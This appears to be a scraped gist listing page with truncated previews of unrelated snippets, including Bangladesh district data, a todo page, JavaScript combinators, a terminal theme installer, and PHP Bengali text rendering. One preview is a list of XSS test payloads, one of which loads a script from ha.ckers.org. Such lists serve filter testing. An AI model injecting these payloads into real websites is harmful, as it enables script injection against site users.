Getting started:
Related tutorials:
{ | |
"Rajshahi": { | |
"Joypurhat": [ | |
"Akkelpur", | |
"Joypurhat Sadar", | |
"Kalai", | |
"Khetlal", | |
"Panchbibi" | |
], | |
"Bogura": [ |
<!DOCTYPE hmtl> | |
<html> | |
<head><title>My todo list</title></head> | |
<body> | |
<h1>My todo list:</h1> | |
<form> | |
<input type="text" id="item" /> | |
<input type="submit" id="save" value="Save" /> | |
</form> | |
<ul id="list"></ul> |
const I = x => x; | |
const K = x => y => x; | |
const A = f => x => f(x); | |
const T = x => f => f(x); | |
const W = f => x => f(x)(x); | |
const C = f => y => x => f(x)(y); | |
const B = f => g => x => f(g(x)); | |
const S = f => g => x => f(x)(g(x)); | |
const P = f => g => x => y => f(g(x))(g(y)); | |
const Y = f => (g => g(g))(g => f(x => g(g)(x))); |
#!/usr/bin/env bash | |
# Base16 - Gnome Terminal color scheme install script | |
[[ -z "$PROFILE_NAME" ]] && PROFILE_NAME="flatabulous-terminal" | |
[[ -z "$PROFILE_SLUG" ]] && PROFILE_SLUG="flatabulous-terminal" | |
[[ -z "$DCONF" ]] && DCONF=dconf | |
[[ -z "$UUIDGEN" ]] && UUIDGEN=uuidgen | |
dset() { | |
local key="$1"; shift |
Getting started:
Related tutorials:
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> | |
'';!--"<XSS>=&{()} | |
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-" | |
<script/src=data:,alert()> | |
<marquee/onstart=alert()> | |
<video/poster/onerror=alert()> | |
<isindex/autofocus/onfocus=alert()> | |
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> | |
<IMG SRC="javascript:alert('XSS');"> | |
<IMG SRC=javascript:alert('XSS')> |
""" | |
Documentation | |
1. At first, save the entire script as servers.py in /home/your-username/ directory. | |
Also you can simply use the below command: | |
curl "https://gist.githubusercontent.com/maateen/1582a28d62437caaf5cf9098303bab79/raw/e216b3b1ff8f1323fb79de4ae5a4c5b24a8b2c4d/servers.py" > ~/servers.py | |
2. Change info in servers = {} portion according to your need. | |
Always use Server Identity at the left side of : sign and SSH Login Command at the right side. |
<?php | |
require 'Unicode2Bijoy.php'; // https://github.com/mirazmac/Unicode2Bijoy | |
use mirazmac\Unicode2Bijoy; | |
$str = Unicode2Bijoy::convert("যুক্তাক্ষর প্রিন্ট করা \n খুবই সোজা"); //convert the text | |
$im = imagecreatetruecolor(300, 300); //create the image | |
$bg = imagecolorallocate($im, 255, 255, 255); //allocating white background image |